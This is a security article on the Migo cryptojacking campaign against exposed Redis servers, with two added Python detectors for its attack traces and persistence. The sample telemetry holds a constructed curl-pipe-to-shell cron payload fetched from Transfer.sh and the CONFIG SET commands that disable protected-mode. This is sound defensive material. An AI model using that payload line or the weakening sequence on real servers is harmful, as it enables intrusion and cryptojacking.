Security researchers have recently identified a sophisticated malware campaign targeting Redis, a widely deployed in-memory data store. The campaign, known as “Migo,” compromises exposed Redis servers with the ultimate goal of mining cryptocurrency on the underlying Linux hosts.
Cado Security Labs researchers found that Migo issues a set of Redis configuration commands that weaken the server before abusing it for cryptojacking. These system-weakening commands had not been seen in earlier attacks on Redis, and they are what sets this campaign apart from previous ones.
According to the advisory, Migo is distributed as a Golang ELF binary with compile-time obfuscation and built-in persistence on Linux hosts. It also bundles a modified version of a popular user-mode rootkit to hide its processes and on-disk artifacts.
The initial stage of the attack disables several Redis configuration options through CONFIG SET commands issued with the Redis CLI, among them protected-mode and replica-read-only. Protected mode is what makes a Redis instance with no bind address and no password refuse commands from non-loopback clients, and replica-read-only prevents writes to a replica, so turning both off removes two safeguards that would otherwise limit what a remote, unauthenticated client can do.
Once the server is under their control, the attackers issue commands that fetch and execute further payloads from public hosting services, Transfer.sh and Pastebin among them. These payloads run a cryptocurrency miner in the background and are built to stay unnoticed.
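The two steps above (weaken the server with CONFIG SET, then stage a payload fetch through an ordinary write command) leave a recognisable trace in Redis command telemetry. The following detector is an added example written for this article; it is not code from Cado Security or from the Migo sample. It parses `redis-cli MONITOR` output and flags the indicators the article describes. The MONITOR lines, the client addresses and the Transfer.sh path are constructed placeholders, and the `dir`/`dbfilename` rule is a general Redis abuse indicator that the article does not attribute to Migo.

```python
import re

# Constructed sample of `redis-cli MONITOR` output (not real telemetry from the
# Migo report). Lines 1-3 reproduce the attack pattern the article describes:
# two CONFIG SET commands that weaken the server, then a SET whose value is a
# shell command fetching a payload from Transfer.sh (placeholder path).
# Lines 4-5 are ordinary application traffic.
SAMPLE_MONITOR = """\
1708000001.100000 [0 10.0.0.5:43210] "CONFIG" "SET" "protected-mode" "no"
1708000001.200000 [0 10.0.0.5:43210] "CONFIG" "SET" "replica-read-only" "no"
1708000001.300000 [0 10.0.0.5:43210] "SET" "backup1" "\\n* * * * * curl -fsSL http://transfer.sh/get/sample | sh\\n"
1708000002.000000 [0 10.0.0.9:51000] "GET" "session:abc"
1708000002.500000 [0 10.0.0.9:51000] "SET" "session:abc" "user=42"
"""

# One MONITOR line: <epoch> [<db> <client>] "ARG" "ARG" ...
MONITOR_LINE = re.compile(r'^(\d+\.\d+) \[(\d+) ([^\]]+)\] (.*)$')
# Each argument is a double-quoted string; backslash escapes must not end it early
MONITOR_ARG = re.compile(r'"((?:\\.|[^"\\])*)"')

# CONFIG SET parameters Migo turns off, as described in the article
WEAKENING_PARAMS = {
    "protected-mode": "no",
    "replica-read-only": "no",
    "slave-read-only": "no",   # pre-5.0 name for replica-read-only
}
# General Redis abuse indicator (not attributed to Migo by the article):
# redirecting the RDB dump path is the classic way to write files via Redis
FILE_WRITE_PARAMS = {"dir", "dbfilename"}
# Values that look like a staged payload fetch; hosting sites named in the article
PAYLOAD_FETCH = re.compile(r"(curl|wget)\s|transfer\.sh|pastebin\.com", re.IGNORECASE)


def parse_monitor_line(line):
    """Return (timestamp, db, client, [args]) or None for a non-command line."""
    m = MONITOR_LINE.match(line.strip())
    if not m:
        return None
    ts, db, client, rest = m.groups()
    return ts, int(db), client, MONITOR_ARG.findall(rest)


def classify(args):
    """Return a reason string if the command matches a Migo-style indicator, else None."""
    if not args:
        return None
    cmd = args[0].lower()
    if cmd == "config" and len(args) >= 4 and args[1].lower() == "set":
        param, value = args[2].lower(), args[3].lower()
        if WEAKENING_PARAMS.get(param) == value:
            return f"CONFIG SET {param} {value}: server hardening disabled"
        if param in FILE_WRITE_PARAMS:
            return f"CONFIG SET {param}: RDB dump path redirected (file-write primitive)"
    if cmd in ("set", "append", "setex", "mset") and len(args) >= 3:
        # Write commands carry the value in args[2:]; look for a fetch-and-run string
        if PAYLOAD_FETCH.search(" ".join(args[2:])):
            return "value contains a remote payload fetch command"
    return None


def scan_monitor(text):
    """Scan MONITOR output; return a list of (timestamp, client, command, reason)."""
    findings = []
    for line in text.splitlines():
        parsed = parse_monitor_line(line)
        if not parsed:
            continue
        ts, _db, client, args = parsed
        reason = classify(args)
        if reason:
            findings.append((ts, client, " ".join(args[:2]).upper(), reason))
    return findings


if __name__ == "__main__":
    for finding in scan_monitor(SAMPLE_MONITOR):
        print(*finding, sep=" | ")
```

MONITOR is expensive on a busy instance, so in practice this logic belongs on an ACL log, a proxy, or a network capture of the Redis port rather than on a permanently attached MONITOR client. The same CONFIG SET sequence can be blocked outright by keeping protected-mode on, setting requirepass or ACLs, and renaming or disabling the CONFIG command in redis.conf (`rename-command CONFIG ""`).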
One notable aspect of Migo is its compile-time obfuscation, which strips and mangles the binary’s symbols and strings; the function names and embedded strings that would normally reveal a Go binary’s purpose are therefore unavailable, and reverse engineering takes considerably more effort. The user-mode rootkit hides Migo’s processes and on-disk artifacts from tools running on the compromised host. Because rootkits of this kind work by hooking library calls in userland (typically through LD_PRELOAD), process and file listings taken on the host itself cannot be trusted; analysts should verify from outside the compromised userland, for example with statically linked tools or against a disk image.
For persistence, Migo installs systemd service and timer units so that the malware is re-executed on a schedule and survives reboots. It also rewrites the system’s hosts file so that domains associated with cloud providers resolve to a local address, which blocks outbound traffic to them; silencing a provider’s monitoring and security agents in this way is a common step in cloud-focused cryptojacking.
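Both persistence artifacts described above can be checked for on a Redis host without any knowledge of the specific sample. The script below is an added example written for this article, not code from Cado Security or from the Migo campaign. It flags hosts-file entries that pin non-local hostnames to a sinkhole address and systemd services (and the timers that re-activate them) whose ExecStart runs from a world-writable or hidden directory. The hosts-file content, the cloud-provider domain, the unit names and the paths are constructed placeholders.

```python
import configparser
import re

# Addresses that make a hostname unreachable when placed in /etc/hosts
SINKHOLE_ADDRS = {"127.0.0.1", "0.0.0.0", "::1", "::"}
# Names a stock Linux /etc/hosts legitimately maps to loopback
BENIGN_LOCAL = {"localhost", "localhost.localdomain", "localhost4", "localhost6",
                "ip6-localhost", "ip6-loopback"}

# Constructed /etc/hosts content (not from the Migo report). The last two
# lines imitate the tampering the article describes: hostnames belonging to a
# cloud provider (placeholder domain) pinned to a sinkhole address.
SAMPLE_HOSTS = """\
127.0.0.1   localhost
127.0.1.1   web01.example.internal web01
::1         localhost ip6-localhost ip6-loopback
127.0.0.1   monitor.cloud-provider.example   # added by attacker
0.0.0.0     update.agent.cloud-provider.example
"""

# Constructed systemd units (not from the Migo report): a benign pair and a
# pair whose ExecStart lives in a hidden directory under /tmp.
SAMPLE_UNITS = {
    "backup.service": "[Service]\nExecStart=/usr/bin/rsync -a /srv /backup\n",
    "backup.timer": "[Timer]\nOnCalendar=daily\n[Install]\nWantedBy=timers.target\n",
    "sync-cache.service": "[Unit]\nDescription=cache sync\n[Service]\n"
                          "ExecStart=/tmp/.cache/runner --quiet\nRestart=always\n",
    "sync-cache.timer": "[Timer]\nOnBootSec=60\nOnUnitActiveSec=300\n"
                        "[Install]\nWantedBy=timers.target\n",
}

# Directories from which a legitimately packaged service binary is run
TRUSTED_PREFIXES = ("/usr/", "/bin/", "/sbin/", "/lib/", "/opt/", "/etc/")
# Places droppers favour: world-writable tmp dirs and hidden directories anywhere
UNTRUSTED_PATH = re.compile(r"^(/tmp/|/var/tmp/|/dev/shm/|.*/\.)")


def sinkholed_hosts(hosts_text, own_hostname):
    """Return (line_no, address, hostname) for non-local names pinned to a sinkhole address."""
    findings = []
    for line_no, raw in enumerate(hosts_text.splitlines(), 1):
        fields = raw.split("#", 1)[0].split()          # drop comments, then tokenize
        if len(fields) < 2 or fields[0] not in SINKHOLE_ADDRS:
            continue
        for name in fields[1:]:
            if name in BENIGN_LOCAL or name == own_hostname or name.startswith(own_hostname + "."):
                continue
            findings.append((line_no, fields[0], name))
    return findings


def _parse_unit(text):
    # Unit files are INI-like; "=" is the only delimiter and keys keep their case
    cp = configparser.ConfigParser(strict=False, interpolation=None, delimiters=("=",))
    cp.optionxform = str
    cp.read_string(text)
    return cp


def exec_path(exec_start):
    """First token of ExecStart= with systemd's special prefixes (-, @, +, !, :) stripped."""
    tokens = exec_start.split()
    return tokens[0].lstrip("-@+!:") if tokens else ""


def suspicious_units(units):
    """units: {unit file name: text}. Return (unit, reason) for services run from
    untrusted paths and for timers that re-activate such a service."""
    flagged = {}
    for name, text in units.items():
        if name.endswith(".service"):
            path = exec_path(_parse_unit(text).get("Service", "ExecStart", fallback=""))
            if path and (UNTRUSTED_PATH.match(path) or not path.startswith(TRUSTED_PREFIXES)):
                flagged[name] = f"ExecStart runs from untrusted path {path}"
    findings = list(flagged.items())
    for name, text in units.items():
        if name.endswith(".timer"):
            # A timer activates the unit named by Unit=, else the same-named .service
            target = _parse_unit(text).get("Timer", "Unit", fallback=name[:-len(".timer")] + ".service")
            if target in flagged:
                findings.append((name, f"timer re-activates flagged unit {target}"))
    return findings


if __name__ == "__main__":
    print(sinkholed_hosts(SAMPLE_HOSTS, "web01"))
    print(suspicious_units(SAMPLE_UNITS))
```

On a live host, feed `sinkholed_hosts` the contents of /etc/hosts and `suspicious_units` a dict built from /etc/systemd/system and /run/systemd/system. Since the article says Migo’s rootkit hides on-disk artifacts, run the collection with a statically linked tool or against a mounted image rather than trusting `ls` and `systemctl` on the compromised host.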
Cado Security highlighted that “Migo demonstrates that cloud-focused attackers are continuing to refine their techniques and improve their ability to exploit web-facing services.” Cado also notes that the user-mode rootkit could complicate post-incident forensics of hosts compromised by Migo.
In conclusion, the Migo campaign is a significant threat to Redis servers and the Linux hosts behind them, and it shows how cryptojacking tradecraft against Redis keeps evolving. The practical defences are the established ones: do not expose Redis to the Internet, keep protected-mode on, set bind and requirepass (or ACLs), consider renaming or disabling the CONFIG command, and alert on CONFIG SET commands, new systemd units and hosts file changes on Redis hosts.